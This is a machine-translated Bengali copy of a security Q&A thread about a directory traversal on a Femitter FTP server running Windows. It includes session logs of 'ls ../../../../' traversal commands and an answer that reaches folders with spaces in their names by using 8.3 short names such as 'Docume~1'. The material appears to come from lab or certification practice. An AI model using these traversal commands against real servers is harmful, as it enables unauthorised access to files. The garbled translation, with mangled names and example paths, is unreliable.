সাদা স্পেসযুক্ত ডিরেক্টরিগুলিতে এফটিপি ডিরেক্টরি ট্রভারসাল আক্রমণ

15

আমি একটি বদ্ধ রেফারেন্স এনভায়রনমেন্টে অনুমোদিত অনুমোদিত পেনটেষ্ট পরিচালনা করছি এবং একটি আপাতদৃষ্টিতে সরল ইস্যুতে লড়াই করে আমি বর্তমানে সমাধান করতে পারছি না।

এমএস উইন্ডোজ ওএসে চলমান একটি অরক্ষিত ফেরমিটার এফটিপি সার্ভারের বিরুদ্ধে ডিরেক্টরি ট্র্যাভারসাল আক্রমণ চালানোর চেষ্টা করার সময়, সিস্টেম রুটে একটি তালিকা তৈরি করা সম্ভব (কেবলমাত্র রেফারেন্সের জন্য ঠিকানা এবং সামগ্রীর তালিকা এখানে পরিবর্তিত হয়েছে):

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok

যাইহোক, যদি আমি সাদা জায়গাগুলির মতো কোনও ফোল্ডারের বিষয়বস্তু তালিকাবদ্ধ করতে চাই, তবে Documents and settingsসাদা স্থানগুলিকে উপেক্ষা করার কারণে আমি ডিরেক্টরি সামগ্রীর তালিকা করতে পারছি না।

ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok

আমি ইতিমধ্যে বিভিন্ন এফটিপি ক্লায়েন্ট (সিএলআই এবং জিইউআই, লিনাক্স এবং উইন্ডোজ) ব্যবহার করার চেষ্টা করেছি এবং হয় তারা সাদা স্পেস অগ্রাহ্য করে অথবা ডিরেক্টরি ট্র্যাভারসালকে অস্বীকার করে।

প্রথমে কাঁচা সকেট ব্যবহার করে পাইথনের উপর আক্রমণটি স্ক্রিপ্ট করার চেষ্টা করে এবং তারপরে সরাসরি এফটিপি সার্ভারে এইচএক্স ফর্ম্যাটে কমান্ডগুলি প্রেরণ করার জন্য, তবে কোনও সাফল্য না পেয়ে।

কয়েক ঘন্টার জন্য গুগল একটি কার্যক্ষম সমাধান দেয় নি (হ্যাঁ, প্রচুর বিকল্প ছিল, যা কাজ করেনি), এ কারণেই এখানে কেউ আছেন, যার একই সমস্যা ছিল। অত্যন্ত নিশ্চিত যে, সাদা স্থানগুলির সাথে এই জাতীয় ডিরেক্টরি ট্রভারসালালের প্রয়োজন প্রথম নয়।

ftp  attack-vector 
বহিষ্কার
সূত্র
কেস সংবেদনশীলতা এফটিপি ক্লায়েন্টদের জন্য অপ্রাসঙ্গিক বলে মনে হচ্ছে। কমপক্ষে জিএনইউ / লিনাক্স এফটিপি ক্লায়েন্ট অক্ষরের ক্ষেত্রে উপেক্ষা করে ডিরেক্টরি তালিকা করে।
@ লকআউট: কেস সংবেদনশীলতা হ'ল একটি ক্লায়েন্ট জিনিস নয়। ক্লায়েন্টরা সার্ভার যেভাবে প্রেরণ করে সেভাবে ডেটা তালিকাভুক্ত করে এবং কেস পরিবর্তন করে না।
স্টিফেন অলারিখ
1
সি: \ ডকুমেন্ট ~ 1 \ দিয়েও চেষ্টা করুন।
কুকুর খাওয়ার বিড়াল বিশ্ব
1
\ডিরেক্টরি স্ট্রিং সহ ফাঁকা স্থানগুলি পালানোর চেষ্টা করুন
ডেভিডপস্টিল
1
আমি খুশি যে এটি আপনার জন্য কাজ করেছে আপনি যেহেতু আপনার প্রশ্নের উত্তর দেওয়ার ঝামেলা পেরিয়ে গেছেন, তাই আমার পক্ষে এটি ঠিক যে আপনি এটি উত্তর হিসাবে গ্রহণ করেছেন। আমাকে জমা দেওয়ার জন্য ধন্যবাদ
কুকুর খাওয়ার বিড়াল বিশ্ব

উত্তর:

16

এমএস উইন্ডোজ ডিরেক্টরি সংক্ষিপ্ত স্বরলিপি যেমন ব্যবহার করার জন্য @ দোজিটকাটওয়ার্ল্ড প্রস্তাবিত সমাধান C:\Docume~1\

ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

এমএস নলেজ বেস থেকে সত্যই ভাল নিবন্ধটি 8.3 ডিরেক্টরি নোটেশনটি ব্যাখ্যা করে: উইন্ডোজ কীভাবে লং ফাইলের নাম থেকে 8.3 ফাইলের নাম উত্পন্ন করে

বহিষ্কার
সূত্র
2
ওএসসিপি আমি দেখছি। আপনার টিপটিতে যুক্ত করতে, "সমস্ত ব্যবহারকারী" এর মতো সংক্ষিপ্ত ডিরেক্টরিগুলির জন্য, স্থানটি ফেলে দিন এবং "AllUse ~ 1" ব্যবহার করুন। ইন্টারেক্টিভভাবে ব্রাউজ করার জন্য আপনি কি এফটিপি মাউন্ট করার কোনও উপায় খুঁজে পেয়েছেন, অথবা আপনি কেবল একের পর এক ফাইল ডাউনলোড শেষ করেছেন?
n00b 19
1

"সংক্ষিপ্ত নাম" প্রকৃতপক্ষে পুরানো ডস 8.3 নামকরণের কনভেনশন, সুতরাং সমস্ত ডিরেক্টরিগুলি প্রথম 6 টি অক্ষর হবে যার পরে ~ 1 ধরে ধরে নেওয়া হবে যে কেবল একটির সাথে মিল আছে, উদাহরণস্বরূপ:

সি: \ এবিসিডিইএফ ~ 1 - সি: \ এবিবিডিইডিএফজি আই ডাইরেক্টরি
সি: \ বিসিডিইডিএফজি ~ 1 - সি: \ বিসিডিইডিএফজিআইজিএল এম অন্য একটি ডিরেক্টরি

এখানে একমাত্র ব্যতিক্রম:

সি: \ এবিসিডিইএফ ~ 1 - সি: \ আমি বিসিডিডিএফজি আই ডাইরেক্টরি সি: \ এবিসিডিএফ
~ 2 - সি: \ পাশাপাশি এবিসিডিডিএফজিএইচই ডিরেক্টরি

উত্স: উইন্ডোজ ডিরেক্টরি / ফাইলের সংক্ষিপ্ত পথটি কীভাবে খুঁজে পাব?

madsport
সূত্র
0

Ftp ইউআরএল এনকোডিং ব্যবহার করে না, সুতরাং আপনি যদি এমন কোনও ব্রাউজারে এফটিপি ব্যবহার না করেন যা আপনার জন্য এটি অনুবাদ করতে পারে তবে% xx কাজ করবে না।

পরিবর্তে এর চারপাশে উদ্ধৃতি ব্যবহার করার চেষ্টা করুন, যেমন: ls "../../some dir"

wireghoul
সূত্র
1
এইচআই, আপনি যদি ডিরেক্টরি ট্র্যাভারসালের জন্য চেষ্টা করা প্রয়াস দেখতে পান তবে আপনি দেখতে পাবেন যে আমি একাধিক উদ্ধৃতি চেষ্টা করেছি: একক উদ্ধৃতি, ডাবল উদ্ধৃতি এবং পিছনে টিক। এফটিপি আউটপুট তালিকার প্রতিনিধিত্ব করে তারা কাজ করেনি। সমস্ত বিকল্পের চেষ্টা করার মরিয়া চেষ্টা করার কারণে% 20 ব্যবহার করা যদি এটির কাজ করে তবেই তা পরীক্ষা করতে পারে। অবশ্যই% এনকোডিং ব্রাউজার এবং এফটিপি ক্লায়েন্টদের তাদের ব্যাখ্যা করতে সক্ষম হয়ে কাজ করে।
লকআউট
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.